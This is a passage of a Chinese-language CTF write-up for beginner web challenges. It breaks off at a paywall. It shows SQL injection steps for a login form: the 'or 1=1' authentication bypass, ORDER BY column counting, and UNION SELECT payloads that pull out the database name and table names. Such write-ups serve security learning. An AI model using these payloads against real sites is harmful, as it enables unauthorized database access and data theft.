本文讲述了如何通过右键查看源代码、SQL注入技术分析数据库结构,以及使用BurpSuite抓包工具修改POST请求获取文件,涉及GETvsPOST请求的区别和文件包含漏洞的利用。
web01
右键查看源代码,再使用在线解密,就可以得出答案了
web02 sql注入
admin' or 1=1或者1 or 1=1可以登录- 查询几个字段:
1' or 1=1 order by 3 #使用此语句,判断列数。
order by 3不会出错,但是order by 4就没有显示了,因此判断共有3列。
ORDER BY 子句中的数字(如 ORDER BY 4)通常表示按照查询结果中的第几个列进行排序,而不是列名。这意味着 ORDER BY 4 将根据查询结果中的第四列进行排序。
- 使用
-1' union select 1,2,3 #判断回显的位置
发现回显位置是2
1' union select 1,database(),3#查看数据库名称,发现是web21' union select 1,group_concat(table_name),3 from informa
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
